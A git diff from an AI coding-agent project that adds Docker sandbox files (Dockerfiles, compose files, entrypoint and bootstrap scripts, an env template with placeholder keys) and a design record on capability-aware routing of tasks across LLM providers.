coding tools | | **AWS Auth** | Automatic Bedrock credential refresh for AWS-hosted models | -| **TTSR** | Tool-use type-safe runtime validation | +| **Ollama** | First-class local LLM support via Ollama | +| **Claude Code CLI** | External provider extension for Claude Code CLI | +| **cmux** | Claude multiplexer integration — desktop notifications, sidebar metadata, visual subagent splits | +| **GitHub Sync** | Auto-sync milestones to GitHub Issues, PRs, and Milestones | +| **LSP** | Language Server Protocol — diagnostics, definitions, references, hover, rename | +| **TTSR** | Tool-triggered system rules — conditional context injection based on tool usage | ### Bundled Agents @@ -611,7 +617,7 @@ The best practice for working in teams is to ensure unique milestone names acros ### Unique Milestone Names -Create or amend your `.gsd/preferences.md` file within the repo to include `unique_milestone_ids: true` e.g. +Create or amend your `.gsd/PREFERENCES.md` file within the repo to include `unique_milestone_ids: true` e.g. ```markdown --- @@ -620,7 +626,7 @@ unique_milestone_ids: true --- ``` -With the above `.gitignore` set up, the `.gsd/preferences.md` file is checked into the repo ensuring all teammates use unique milestone names to avoid collisions. +With the above `.gitignore` set up, the `.gsd/PREFERENCES.md` file is checked into the repo ensuring all teammates use unique milestone names to avoid collisions. Milestone names will now be generated with a 6 char random string appended e.g. instead of `M001` you'll get something like `M001-ush8s3` @@ -628,7 +634,7 @@ Milestone names will now be generated with a 6 char random string appended e.g. 1. Ensure you are not in the middle of any milestones (clean state) 2. Update the `.gsd/` related entries in your `.gitignore` to follow the `Suggested .gitignore setup` section under `Working in teams` (ensure you are no longer blanket ignoring the whole `.gsd/` directory) -3. Update your `.gsd/preferences.md` file within the repo as per section `Unique Milestone Names` +3. Update your `.gsd/PREFERENCES.md` file within the repo as per section `Unique Milestone Names` 4. If you want to update all your existing milestones use this prompt in GSD: `I have turned on unique milestone ids, please update all old milestone ids to use this new format e.g. M001-abc123 where abc123 is a random 6 char lowercase alpha numeric string. Update all references in all .gsd file contents, file names and directory names. Validate your work once done to ensure referential integrity.` 5. Commit to git @@ -649,7 +655,7 @@ gsd (CLI binary) ├─ resource-loader.ts Syncs bundled extensions + agents to ~/.gsd/agent/ └─ src/resources/ ├─ extensions/gsd/ Core GSD extension (auto, state, commands, ...) - ├─ extensions/... 18 supporting extensions + ├─ extensions/... 23 supporting extensions ├─ agents/ scout, researcher, worker ├─ AGENTS.md Agent routing instructions └─ GSD-WORKFLOW.md Manual bootstrap protocol diff --git a/docker/.env.example b/docker/.env.example new file mode 100644 index 000000000..ca9c3db84 --- /dev/null +++ b/docker/.env.example @@ -0,0 +1,44 @@ +# ────────────────────────────────────────────── +# GSD Docker Sandbox — Environment Variables +# Copy this file to .env and fill in your keys. +# ────────────────────────────────────────────── + +# ── Container User Identity ── +# Match your host UID/GID to avoid permission issues on bind mounts. +# Run `id -u` and `id -g` on your host to find the right values. +PUID=1000 +PGID=1000 + +# ── LLM Provider API Keys (at least one required) ── + +# Anthropic (Claude) +# ANTHROPIC_API_KEY=sk-ant-... + +# OpenAI +# OPENAI_API_KEY=sk-... + +# Google (Gemini) +# GOOGLE_API_KEY=... + +# OpenRouter (multi-provider gateway) +# OPENROUTER_API_KEY=sk-or-... + +# ── Optional: Research & Search Tools ── + +# Brave Search API +# BRAVE_API_KEY=... + +# Tavily Search API +# TAVILY_API_KEY=tvly-... + +# Jina AI (reader/search) +# JINA_API_KEY=... + +# ── Optional: Git & GitHub ── + +# GitHub personal access token (for PR operations) +# GITHUB_TOKEN=ghp_... + +# Git author identity inside the sandbox +# GIT_AUTHOR_NAME=Your Name +# GIT_AUTHOR_EMAIL=you@example.com diff --git a/docker/Dockerfile.ci-builder b/docker/Dockerfile.ci-builder new file mode 100644 index 000000000..822651db4 --- /dev/null +++ b/docker/Dockerfile.ci-builder @@ -0,0 +1,20 @@ +# ────────────────────────────────────────────── +# CI Builder +# Image: ghcr.io/gsd-build/gsd-ci-builder +# Used by: pipeline.yml Dev stage +# ────────────────────────────────────────────── +FROM node:24-bookworm + +# Rust toolchain (stable, minimal profile) +RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable --profile minimal +ENV PATH="/root/.cargo/bin:${PATH}" + +# Cross-compilation for linux-arm64 +RUN apt-get update && apt-get install -y --no-install-recommends \ + gcc-aarch64-linux-gnu \ + g++-aarch64-linux-gnu \ + && rustup target add aarch64-unknown-linux-gnu \ + && rm -rf /var/lib/apt/lists/* + +# Verify toolchain +RUN node --version && rustc --version && cargo --version diff --git a/docker/Dockerfile.sandbox b/docker/Dockerfile.sandbox new file mode 100644 index 000000000..596bdf803 --- /dev/null +++ b/docker/Dockerfile.sandbox @@ -0,0 +1,42 @@ +# ────────────────────────────────────────────── +# GSD Docker Sandbox Template +# Base: docker/sandbox-templates:shell +# Purpose: Isolated environment for GSD auto mode +# Usage: docker sandbox create --template ./docker +# ────────────────────────────────────────────── +FROM node:24-bookworm-slim + +# System dependencies required by GSD +RUN apt-get update && apt-get install -y --no-install-recommends \ + git \ + curl \ + ca-certificates \ + openssh-client \ + gosu \ + && rm -rf /var/lib/apt/lists/* + +# Install GSD globally — version controlled via build arg +ARG GSD_VERSION=latest +RUN npm install -g gsd-pi@${GSD_VERSION} + +# Create non-root user for sandbox isolation +RUN groupadd --gid 1000 gsd \ + && useradd --uid 1000 --gid gsd --shell /bin/bash --create-home gsd + +# Persistent GSD state directory +RUN mkdir -p /home/gsd/.gsd && chown -R gsd:gsd /home/gsd/.gsd + +# Workspace directory — synced from host via Docker sandbox +WORKDIR /workspace +RUN chown gsd:gsd /workspace + +# Entrypoint handles UID/GID remapping, bootstrap, and drops to gsd user +COPY entrypoint.sh /usr/local/bin/entrypoint.sh +COPY bootstrap.sh /usr/local/bin/bootstrap.sh +RUN chmod +x /usr/local/bin/entrypoint.sh /usr/local/bin/bootstrap.sh + +# Expose default GSD web UI port +EXPOSE 3000 + +ENTRYPOINT ["/usr/local/bin/entrypoint.sh"] +CMD ["gsd", "--help"] diff --git a/docker/README.md b/docker/README.md new file mode 100644 index 000000000..4d9e8ae06 --- /dev/null +++ b/docker/README.md @@ -0,0 +1,144 @@ +# GSD Docker Sandbox + +Run GSD auto mode inside an isolated Docker sandbox so it cannot touch your host filesystem, SSH keys, or other projects. + +## Prerequisites + +- Docker Desktop 4.58+ (macOS or Windows; Linux support is experimental) +- At least one LLM provider API key + +## Docker Images + +| File | Purpose | +|------|---------| +| `Dockerfile.sandbox` | Runtime sandbox with entrypoint (UID remapping, bootstrap) | +| `Dockerfile.ci-builder` | CI builds — includes build tools, no entrypoint magic | + +## Compose Files + +| File | Purpose | +|------|---------| +| `docker-compose.yaml` | Minimal zero-config setup — just works with sensible defaults | +| `docker-compose.full.yaml` | Fully documented reference with all options, resource limits, health checks | + +Start with `docker-compose.yaml`. Copy options from `docker-compose.full.yaml` when you need them. + +## Quick Start + +### Option A: Docker Sandbox CLI (recommended) + +Docker Sandboxes provide MicroVM isolation — each sandbox runs in a lightweight VM with its own kernel and private Docker daemon. + +```bash +# Create a sandbox from the template +docker sandbox create --template ./docker --name gsd-sandbox + +# Shell into the sandbox +docker sandbox exec -it gsd-sandbox bash + +# Inside the sandbox, run GSD +gsd auto "implement the feature described in issue #42" +``` + +### Option B: Docker Compose + +For environments without Docker Sandbox support, use Compose for container-level isolation: + +```bash +# 1. Configure API keys +cp docker/.env.example docker/.env +# Edit docker/.env with your keys + +# 2. Start the sandbox +docker compose -f docker/docker-compose.yaml up -d + +# 3. Shell into the container +docker exec -it gsd-sandbox bash + +# 4. Run GSD inside the container +gsd auto "implement the feature described in issue #42" +``` + +## UID/GID Remapping + +The entrypoint handles UID/GID remapping via `PUID` and `PGID` environment variables. This avoids permission issues on bind-mounted volumes by matching the container's `gsd` user to your host UID/GID. + +```bash +# Find your host UID/GID +id -u # PUID +id -g # PGID +``` + +Set these in your `.env` file or in the `environment` section of the compose file. Defaults to `1000:1000`. + +## Entrypoint Behavior + +The container entrypoint (`entrypoint.sh`) runs four steps on every start: + +1. **UID/GID remapping** — adjusts the `gsd` user to match `PUID`/`PGID` +2. **Pre-create critical files** — prevents Docker bind-mount from creating directories where files are expected +3. **Sentinel-based bootstrap** — runs `bootstrap.sh` exactly once on first boot +4. **Drop privileges** — `exec gosu gsd` for proper PID 1 signal forwarding + +No hardcoded `user:` directive in compose — the entrypoint starts as root, remaps, then drops to `gsd`. + +## Two-Terminal Workflow + +GSD's recommended workflow uses two terminals — one for auto mode, one for interactive discussion: + +```bash +# Terminal 1: auto mode +docker sandbox exec -it gsd-sandbox bash +gsd auto "your task description" + +# Terminal 2: discuss / monitor +docker sandbox exec -it gsd-sandbox bash +gsd discuss +``` + +With Docker Compose, replace `docker sandbox exec` with `docker exec`. + +## Credential Injection + +### Docker Sandbox (automatic) + +Docker's proxy layer forwards API keys set in your host shell config (`~/.bashrc`, `~/.zshrc`) into the sandbox automatically. Keys are never stored inside the sandbox. + +### Docker Compose (manual) + +Copy `docker/.env.example` to `docker/.env` and fill in your keys. The `.env` file is gitignored and never committed. + +## Network Allowlisting + +If you restrict outbound network access in your sandbox, GSD needs these endpoints: + +| Purpose | Endpoints | +|---------|-----------| +| LLM APIs | `api.anthropic.com`, `api.openai.com`, `generativelanguage.googleapis.com`, `openrouter.ai` | +| Package registry | `registry.npmjs.org` | +| Research tools | `api.search.brave.com`, `api.tavily.com`, `r.jina.ai` | +| GitHub | `api.github.com`, `github.com` | + +## Customizing the Image + +Build with a specific GSD version: + +```bash +docker compose -f docker/docker-compose.yaml build --build-arg GSD_VERSION=2.51.0 +``` + +## Cleanup + +```bash +# Docker Sandbox +docker sandbox rm gsd-sandbox + +# Docker Compose +docker compose -f docker/docker-compose.yaml down -v +``` + +## Known Limitations + +- **macOS/Windows only**: Docker Sandboxes require Docker Desktop 4.58+. Linux sandbox support is experimental. +- **Environment parity**: The sandbox runs Ubuntu (Debian). macOS-only dependencies may not work inside the sandbox. +- **Named agent registration**: Docker Desktop's built-in named agents (claude, codex, etc.) are registered by Docker itself. Third-party tools cannot register new named agents. GSD uses the generic shell sandbox type with a custom template instead. diff --git a/docker/bootstrap.sh b/docker/bootstrap.sh new file mode 100755 index 000000000..463952877 --- /dev/null +++ b/docker/bootstrap.sh @@ -0,0 +1,27 @@ +#!/bin/bash +set -e + +# ────────────────────────────────────────────── +# GSD First-Boot Bootstrap +# +# Runs once on initial container creation. +# Called by entrypoint.sh as the gsd user. +# +# This script is idempotent — safe to run multiple +# times, but the sentinel in entrypoint.sh ensures +# it only runs once in practice. +# ────────────────────────────────────────────── + +# ── Git Identity ──────────────────────────────────────── +# Without this, git commits inside the container will fail +# or use garbage defaults. + +if [ -n "${GIT_AUTHOR_NAME}" ]; then + git config --global user.name "${GIT_AUTHOR_NAME}" +fi + +if [ -n "${GIT_AUTHOR_EMAIL}" ]; then + git config --global user.email "${GIT_AUTHOR_EMAIL}" +fi + +echo "Bootstrap complete." diff --git a/docker/docker-compose.full.yaml b/docker/docker-compose.full.yaml new file mode 100644 index 000000000..6ff8cad83 --- /dev/null +++ b/docker/docker-compose.full.yaml @@ -0,0 +1,61 @@ +services: + gsd: + build: + context: . # Build context is the docker/ directory + dockerfile: Dockerfile.sandbox # Runtime sandbox image with entrypoint + args: + GSD_VERSION: latest # Pin a specific version: GSD_VERSION=2.51.0 + + container_name: gsd-sandbox + + ports: + - "3000:3000" # GSD web UI + + volumes: + - ../:/workspace # Project root mounted into the container + - gsd-state:/home/gsd/.gsd # Persistent GSD state across restarts + # - ~/.ssh:/home/gsd/.ssh:ro # SSH keys for git operations (read-only) + # - ~/.gitconfig:/home/gsd/.gitconfig:ro # Host git config + + env_file: + - .env # API keys and secrets (see .env.example) + + environment: + - NODE_ENV=development + # UID/GID remapping — match your host user to avoid permission issues + # on bind-mounted volumes. The entrypoint remaps the container's gsd + # user to these IDs at startup. Run `id -u` / `id -g` to find yours. + - PUID=1000 + - PGID=1000 + # Git identity inside the container (overrides .env if set here) + # - GIT_AUTHOR_NAME=Your Name + # - GIT_AUTHOR_EMAIL=you@example.com + + stdin_open: true # Keep stdin open for interactive use + tty: true # Allocate a pseudo-TTY + + # Health check — verify GSD is installed and responsive + healthcheck: + test: ["CMD", "gsd", "--version"] + interval: 30s + timeout: 5s + retries: 3 + start_period: 10s + + # Resource limits — uncomment to constrain container resources + # deploy: + # resources: + # limits: + # cpus: "4.0" + # memory: 8G + # reservations: + # cpus: "1.0" + # memory: 2G + + # Network mode — uncomment ONE if you need host networking + # network_mode: host # Full host network access (no port mapping needed) + # network_mode: bridge # Default Docker bridge (already the default) + +volumes: + gsd-state: + driver: local diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml new file mode 100644 index 000000000..21641e2f1 --- /dev/null +++ b/docker/docker-compose.yaml @@ -0,0 +1,23 @@ +services: + gsd: + build: + context: . + dockerfile: Dockerfile.sandbox + args: + GSD_VERSION: latest + container_name: gsd-sandbox + ports: + - "3000:3000" + volumes: + - ../:/workspace + - gsd-state:/home/gsd/.gsd + env_file: + - .env + environment: + - NODE_ENV=development + stdin_open: true + tty: true + +volumes: + gsd-state: + driver: local diff --git a/docker/entrypoint.sh b/docker/entrypoint.sh new file mode 100755 index 000000000..465a28fe0 --- /dev/null +++ b/docker/entrypoint.sh @@ -0,0 +1,81 @@ +#!/bin/bash +set -e + +# ────────────────────────────────────────────── +# GSD Container Entrypoint +# +# Responsibilities: +# 1. UID/GID remapping — match host user via PUID/PGID +# 2. Pre-create critical files — prevent Docker bind-mount +# from creating directories where files are expected +# 3. Sentinel-based bootstrap — one-time first-boot setup +# 4. Signal forwarding — exec into the final process +# ────────────────────────────────────────────── + +GSD_USER="gsd" +GSD_HOME="/home/${GSD_USER}" +GSD_DIR="${GSD_HOME}/.gsd" + +# ── 1. UID/GID Remapping ──────────────────────────────── +# Accept PUID/PGID from the environment so the container +# can run with the same UID/GID as the host user, avoiding +# permission headaches on bind-mounted volumes. + +PUID="${PUID:-1000}" +PGID="${PGID:-1000}" + +CURRENT_UID=$(id -u "${GSD_USER}") +CURRENT_GID=$(id -g "${GSD_USER}") + +REMAPPED=0 + +if [ "${PGID}" != "${CURRENT_GID}" ]; then + groupmod -o -g "${PGID}" "${GSD_USER}" + REMAPPED=1 +fi + +if [ "${PUID}" != "${CURRENT_UID}" ]; then + usermod -o -u "${PUID}" "${GSD_USER}" + REMAPPED=1 +fi + +# Fix ownership only when UID/GID actually changed +if [ "${REMAPPED}" -eq 1 ]; then + chown -R "${PUID}:${PGID}" "${GSD_HOME}" + chown "${PUID}:${PGID}" /workspace +fi + +# ── 2. Pre-create Critical Files ──────────────────────── +# Docker bind-mounts will create a *directory* if the target +# path doesn't exist. We need these to be files, so touch +# them before Docker gets a chance to mangle things. + +mkdir -p "${GSD_DIR}" + +if [ ! -f "${GSD_DIR}/settings.json" ]; then + echo '{}' > "${GSD_DIR}/settings.json" +fi + +chown "${PUID}:${PGID}" "${GSD_DIR}" "${GSD_DIR}/settings.json" + +# ── 3. Sentinel-based Bootstrap ───────────────────────── +# Run first-boot setup exactly once. Subsequent container +# starts (or restarts) skip this entirely. + +SENTINEL="${GSD_DIR}/.bootstrapped" + +if [ ! -f "${SENTINEL}" ]; then + if [ -x /usr/local/bin/bootstrap.sh ]; then + # Run bootstrap as the gsd user so files get correct ownership + gosu "${GSD_USER}" /usr/local/bin/bootstrap.sh + fi + touch "${SENTINEL}" + chown "${PUID}:${PGID}" "${SENTINEL}" +fi + +# ── 4. Drop Privileges & Exec ────────────────────────── +# Replace this shell process with the final command running +# as the gsd user. exec + gosu = proper PID 1 = proper +# signal forwarding (SIGTERM, SIGINT, etc.). + +exec gosu "${GSD_USER}" "$@" diff --git a/docs/ADR-004-capability-aware-model-routing.md b/docs/ADR-004-capability-aware-model-routing.md new file mode 100644 index 000000000..c2ce3d2d2 --- /dev/null +++ b/docs/ADR-004-capability-aware-model-routing.md @@ -0,0 +1,460 @@ +# ADR-004: Capability-Aware Model Routing + +**Status:** Implemented (Phase 2) +**Date:** 2026-03-26 +**Revised:** 2026-04-03 +**Deciders:** Jeremy McSpadden +**Related:** ADR-003 (pipeline simplification), [Issue #2655](https://github.com/gsd-build/gsd-2/issues/2655), `docs/dynamic-model-routing.md` + +## Context + +GSD already supports dynamic model routing in auto-mode, but the current router is fundamentally **complexity-tier and cost based**, not **task-capability based**. + +Today the selection pipeline is: + +``` +unit dispatch + → classifyUnitComplexity(unitType, unitId, basePath, budgetPct) + → UNIT_TYPE_TIERS default mapping + → analyzeTaskComplexity() / analyzePlanComplexity() [metadata heuristics] + → getAdaptiveTierAdjustment() [routing history] + → applyBudgetPressure() [budget ceiling] + → resolveModelForComplexity(classification, phaseConfig, routingConfig, availableModelIds) + → downgrade-only: never upgrades beyond user's configured model + → MODEL_CAPABILITY_TIER lookup → cheapest available in tier + → fallback chain assembly + → resolveModelId() → pi.setModel() + → before_provider_request hook (payload mutation only) +``` + +This architecture works when all models inside a tier are effectively interchangeable. That assumption no longer holds. + +Users increasingly configure heterogeneous provider pools through `models.json`, scoped provider setup, and `/scoped-models`. In practice: + +- Claude-class models often perform best on greenfield implementation and architecture work +- Codex-class models often perform best on debugging, refactoring, and root-cause analysis +- Gemini-class models often perform best on long-context synthesis and research-heavy tasks +- Fast small models are often best for cheap validation, triage, and lightweight hooks + +The current router cannot express those differences. If Claude and Codex are both available at the same tier, GSD either: + +- treats them as equivalent and picks the cheaper one, or +- requires the user to hardcode specific phase models manually + +That produces three structural problems: + +### 1. Wrong optimization target + +The router optimizes primarily for **task difficulty vs model cost**. The real problem is **task requirements vs model strengths**, subject to cost constraints. + +### 2. Poor behavior with heterogeneous pools + +Different users have different subscriptions and provider access. A fixed mapping like "research always uses Gemini" does not generalize when the user only has Claude + Codex, or only local models. + +### 3. Capability knowledge is trapped in user intuition + +Experienced users know which models are better at coding, debugging, research, long-context work, or instruction following. GSD has no representation for that knowledge, so it cannot route intelligently on the user's behalf. + +The system already has several building blocks that make a richer router feasible: + +- unit types already encode the kind of work being dispatched +- `complexity-classifier.ts` already extracts rich `TaskMetadata` (file counts, dependency counts, tags, complexity keywords, code block counts) +- `auto-dispatch.ts` and prompt builders provide stable task categories +- `ctx.modelRegistry.getAvailable()` exposes the current model pool +- `models.json` already supports user overrides and cost data per model +- budget ceilings, routing history, and retry escalation already exist +- the `model_select` hook fires on model changes and could be extended for pre-selection interception + +## Decision + +**Extend dynamic routing from a one-dimensional tier system to a two-dimensional system that combines complexity classification ("how hard") with capability scoring ("what kind"), while preserving downgrade-only semantics, budget controls, and user overrideability.** + +### Design Principles + +1. **Downgrade-only invariant is preserved.** The user's configured model for a phase is always the ceiling. Capability scoring ranks models within the eligible set — it never promotes above the user's configured model. + +2. **Complexity classification remains.** The existing `classifyUnitComplexity()` pipeline (unit type defaults, task plan analysis, adaptive learning, budget pressure) continues to determine tier eligibility. Capability scoring selects among tier-eligible models. + +3. **Cost is a constraint, not a score dimension.** Budget pressure constrains which models are eligible. Capability profiles describe what models are good at, not what they cost. + +4. **Requirement vectors are dynamic, not static.** Task requirements are computed from `(unitType, TaskMetadata)`, not from unit type alone. + +### The Revised Routing Pipeline + +``` +unit dispatch + → classifyUnitComplexity(unitType, unitId, basePath, budgetPct) + [unchanged — determines tier eligibility and budget filtering] + → resolveModelForComplexity(classification, phaseConfig, routingConfig, availableModelIds) + → STEP 1: filter to tier-eligible models (downgrade-only from user ceiling) + → STEP 2: if capability routing enabled AND >1 eligible model: + → computeTaskRequirements(unitType, taskMetadata) + → scoreEligibleModels(eligible, taskRequirements) + → select highest-scoring model (deterministic tie-break by cost, then ID) + → STEP 3: assemble fallback chain + → resolveModelId() → pi.setModel() +``` + +### Model Capability Profiles + +Each model gains an optional capability profile: + +```ts +interface ModelCapabilities { + coding: number; // greenfield implementation, code generation + debugging: number; // root-cause analysis, error diagnosis, refactoring + research: number; // information synthesis, investigation, exploration + reasoning: number; // multi-step logic, planning, architecture + speed: number; // response latency (inverse of thinking time) + longContext: number; // effective use of large input windows + instruction: number; // instruction following, structured output adherence +} +``` + +Scores are normalized `0–100`. Seven dimensions. No `costEfficiency` dimension — cost is handled separately by budget pressure and tier economics. + +Models without a capability profile are treated as having uniform scores across all dimensions (score 50 in each), which makes capability scoring a no-op for those models and falls back to the existing cheapest-in-tier behavior. + +### Dynamic Task Requirement Vectors + +Requirement vectors are computed as a function of `(unitType, TaskMetadata)`, not looked up from a static table. This preserves the nuance that `classifyUnitComplexity` already captures. + +```ts +function computeTaskRequirements( + unitType: string, + metadata?: TaskMetadata, +): Partial> { + // Base vector from unit type + const base = BASE_REQUIREMENTS[unitType] ?? { reasoning: 0.5 }; + + // Refine based on task metadata (only for execute-task) + if (unitType === "execute-task" && metadata) { + // Docs/config/rename tasks → boost instruction, reduce coding + if (metadata.tags?.some(t => /^(docs?|readme|comment|config|typo|rename)$/i.test(t))) { + return { ...base, instruction: 0.9, coding: 0.3, speed: 0.7 }; + } + // Debugging keywords → boost debugging and reasoning + if (metadata.complexityKeywords?.some(k => k === "concurrency" || k === "compatibility")) { + return { ...base, debugging: 0.9, reasoning: 0.8 }; + } + // Migration/architecture → boost reasoning and coding + if (metadata.complexityKeywords?.some(k => k === "migration" || k === "architecture")) { + return { ...base, reasoning: 0.9, coding: 0.8 }; + } + // Many files or high estimated lines → boost coding + if ((metadata.fileCount ?? 0) >= 6 || (metadata.estimatedLines ?? 0) >= 500) { + return { ...base, coding: 0.9, reasoning: 0.7 }; + } + } + + return base; +} +``` + +Base requirement vectors by unit type: + +```ts +const BASE_REQUIREMENTS: Record>> = { + "execute-task": { coding: 0.9, instruction: 0.7, speed: 0.3 }, + "research-milestone": { research: 0.9, longContext: 0.7, reasoning: 0.5 }, + "research-slice": { research: 0.9, longContext: 0.7, reasoning: 0.5 }, + "plan-milestone": { reasoning: 0.9, coding: 0.5 }, + "plan-slice": { reasoning: 0.9, coding: 0.5 }, + "replan-slice": { reasoning: 0.9, debugging: 0.6, coding: 0.5 }, + "reassess-roadmap": { reasoning: 0.9, research: 0.5 }, + "complete-slice": { instruction: 0.8, speed: 0.7 }, + "run-uat": { instruction: 0.7, speed: 0.8 }, + "discuss-milestone": { reasoning: 0.6, instruction: 0.7 }, + "complete-milestone": { instruction: 0.8, reasoning: 0.5 }, +}; +``` + +### Scoring Function + +```ts +function scoreModel( + model: ModelCapabilities, + requirements: Partial>, +): number { + let weightedSum = 0; + let weightSum = 0; + for (const [dim, weight] of Object.entries(requirements)) { + const capability = model[dim as keyof ModelCapabilities] ?? 50; + weightedSum += weight * capability; + weightSum += weight; + } + return weightSum > 0 ? weightedSum / weightSum : 50; +} +``` + +This produces a **weighted average** in the range `0–100`, where each dimension's contribution is proportional to its requirement weight. The output is directly comparable across models regardless of how many dimensions the requirement vector has. + +**Tie-breaking:** When two models score within 2 points of each other, prefer the cheaper model (by `MODEL_COST_PER_1K_INPUT`). If cost is also equal, break ties by lexicographic model ID for determinism. + +### Configuration Model + +Built-in capability profiles ship as a data table alongside `MODEL_CAPABILITY_TIER` and `MODEL_COST_PER_1K_INPUT` in `model-router.ts`: + +```ts +const MODEL_CAPABILITY_PROFILES: Record = { + "claude-opus-4-6": { coding: 95, debugging: 90, research: 85, reasoning: 95, speed: 30, longContext: 80, instruction: 90 }, + "claude-sonnet-4-6": { coding: 85, debugging: 80, research: 75, reasoning: 80, speed: 60, longContext: 75, instruction: 85 }, + "claude-haiku-4-5": { coding: 60, debugging: 50, research: 45, reasoning: 50, speed: 95, longContext: 50, instruction: 75 }, + "gpt-4o": { coding: 80, debugging: 75, research: 70, reasoning: 75, speed: 65, longContext: 70, instruction: 80 }, + "gpt-4o-mini": { coding: 55, debugging: 45, research: 40, reasoning: 45, speed: 90, longContext: 45, instruction: 70 }, + "gemini-2.5-pro": { coding: 75, debugging: 70, research: 85, reasoning: 75, speed: 55, longContext: 90, instruction: 75 }, + "gemini-2.0-flash": { coding: 50, debugging: 40, research: 50, reasoning: 40, speed: 95, longContext: 60, instruction: 65 }, + "deepseek-chat": { coding: 75, debugging: 65, research: 55, reasoning: 70, speed: 70, longContext: 55, instruction: 65 }, + "o3": { coding: 80, debugging: 85, research: 80, reasoning: 92, speed: 25, longContext: 70, instruction: 85 }, +}; +``` + +Users can override capability profiles in `models.json` per provider: + +```json +{ + "providers": { + "anthropic": { + "modelOverrides": { + "claude-sonnet-4-6": { + "capabilities": { + "debugging": 90, + "research": 85 + } + } + } + } + } +} +``` + +Partial overrides are deep-merged with built-in defaults. This uses the same `modelOverrides` path that already supports `contextWindow`, `cost`, and `compat` overrides. + +### Profile Versioning + +Built-in capability profiles are maintained alongside the existing `MODEL_CAPABILITY_TIER` and `MODEL_COST_PER_1K_INPUT` tables in `model-router.ts`. When the `@gsd/pi-ai` model catalog is updated with new models, the capability profile table must be updated in the same PR. A linting rule should flag any model present in `MODEL_CAPABILITY_TIER` but missing from `MODEL_CAPABILITY_PROFILES`. + +Profiles are versioned implicitly by GSD release. The existing `models.json` `modelOverrides` mechanism allows users to correct stale defaults immediately without waiting for a GSD update. + +### Extension-First Rollout + +Capability-aware routing should be prototypable as an extension before moving to core. The current hook surface is **insufficient** for this: + +- `before_provider_request` fires after model selection, at the API payload level — too late to swap model choice. +- `model_select` fires reactively when a model changes, not before selection — it cannot influence the choice. + +**Required hook addition:** A `before_model_select` hook that fires within `selectAndApplyModel()` after tier classification but before `resolveModelForComplexity()`. This hook would receive: + +```ts +interface BeforeModelSelectEvent { + unitType: string; + unitId: string; + classification: ClassificationResult; + taskMetadata: TaskMetadata; + eligibleModels: string[]; // tier-filtered available models + phaseConfig: ResolvedModelConfig; +} +``` + +Return value: `{ modelId: string } | undefined` (override selection, or undefined to use default). + +This hook enables an extension to implement capability scoring externally, test it against real workloads, and validate behavior before the logic moves into `model-router.ts`. + +**Rollout sequence:** + +1. **Phase 1:** Add `before_model_select` hook and `TaskMetadata` to `ClassificationResult`. Ship built-in capability profile data table. No core routing changes. +2. **Phase 2:** Implement capability scoring as an extension that hooks `before_model_select`. Gather user feedback through routing history. +3. **Phase 3:** If behavior proves stable, move scoring into `resolveModelForComplexity()` in core. Extension hook remains for custom routing strategies. + +### Observability + +Every routing decision must be inspectable. The existing `RoutingDecision` interface is extended: + +```ts +interface RoutingDecision { + modelId: string; + fallbacks: string[]; + tier: ComplexityTier; + wasDowngraded: boolean; + reason: string; + // New fields: + capabilityScores?: Record; // model ID → score + taskRequirements?: Partial>; // dimension → weight + selectionMethod: "tier-only" | "capability-scored"; +} +``` + +When verbose mode is on, the routing notification includes the top-scoring models and why the winner was selected: + +``` +Dynamic routing [S]: claude-sonnet-4-6 (scored 82.3 — coding:0.9×85, debugging:0.6×80) + runner-up: gpt-4o (scored 78.1) +``` + +## Consequences + +### Positive + +#### 1. Better model-task fit + +Routing decisions become based on the kind of work being done, not only how expensive or complex the work appears. A debugging task routes to the strongest debugger in the pool; a research task routes to the best synthesizer. + +#### 2. Works across arbitrary model pools + +The router no longer depends on a hardcoded vendor assumption. If a user has only Claude + Codex, it can still route intelligently between them. If the user adds Gemini or local models later, the same scoring system continues to work. + +#### 3. Preserves all existing invariants + +- **Downgrade-only semantics:** capability scoring never upgrades beyond the user's configured phase model. +- **Budget pressure:** unchanged — constrains tier eligibility before scoring runs. +- **Retry escalation:** unchanged — escalates tier, then scoring picks the best model in the new tier. +- **Fallback chains:** assembled the same way, with capability-scored winner as primary. + +#### 4. Creates a testable, versionable contract for routing behavior + +Capability profiles and task vectors are explicit data structures. Routing decisions are inspectable in verbose mode. The scoring function is a pure function suitable for deterministic unit tests. + +#### 5. Opens the door to adaptive learning + +Existing routing history (`routing-history.ts`) can later refine capability scores per task type. When a model consistently fails at a particular task shape, its effective score for that dimension decreases. This is a natural extension of the existing `getAdaptiveTierAdjustment()` mechanism. + +#### 6. Graceful degradation + +Models without capability profiles get uniform scores, producing the same cheapest-in-tier behavior as today. Zero behavior change for users who don't configure heterogeneous pools. + +### Negative + +#### 1. More metadata to maintain + +Built-in model profiles will drift as model families evolve. Mitigation: profiles live in a single data table, versioned with GSD releases, with a lint rule for completeness. + +#### 2. Scoring can create false precision + +A `0–100` capability scale looks exact but is still heuristic. Mitigation: document profiles as "relative rankings, not benchmarks." The 2-point tie-breaking threshold prevents insignificant score differences from overriding cost optimization. + +#### 3. More routing complexity + +The current tier router is simple to explain and debug. Multi-dimensional scoring is more powerful but harder to reason about. Mitigation: verbose observability output shows scores and reasons. The `selectionMethod` field in routing decisions makes it clear whether capability scoring was active. + +#### 4. Stronger test requirements + +The router will need coverage for: + +- profile loading and override merge rules (partial deep-merge from `modelOverrides`) +- `computeTaskRequirements()` with various unit types and metadata combinations +- scoring function correctness (weighted average, tie-breaking) +- interaction with tier eligibility filtering +- budget pressure applied before scoring, not conflicting with it +- fallback behavior when no scored model is eligible +- graceful degradation when no profiles exist (uniform scores) +- `before_model_select` hook contract (extension path) + +#### 5. New hook surface to maintain + +The `before_model_select` hook adds a new extension API contract that must be maintained across releases. Mitigation: the hook is narrowly scoped — one event type, optional return. + +### Neutral / Migration + +#### 1. Tier-based routing does not disappear + +Complexity tiers remain as: + +- the primary "how hard is this" signal that determines tier eligibility +- the fallback behavior for models without capability profiles +- the escalation path on retries (light → standard → heavy) + +Capability scoring adds the "what kind of work" signal on top. The two systems are layered, not competing. + +#### 2. Existing preferences continue to work + +`dynamic_routing.tier_models` still works — it pins a specific model per tier, bypassing capability scoring for that tier. Per-phase model overrides (`models.planning`, `models.execution`, etc.) continue to set the ceiling. No existing configuration breaks. + +#### 3. Documentation update required + +`docs/dynamic-model-routing.md` must be updated to explain: + +- what capability profiles are and how to override them +- how scoring interacts with tier routing +- how to read verbose routing output +- how to use `before_model_select` for custom routing extensions + +## Risks + +### 1. Hardcoded vendor stereotypes become stale + 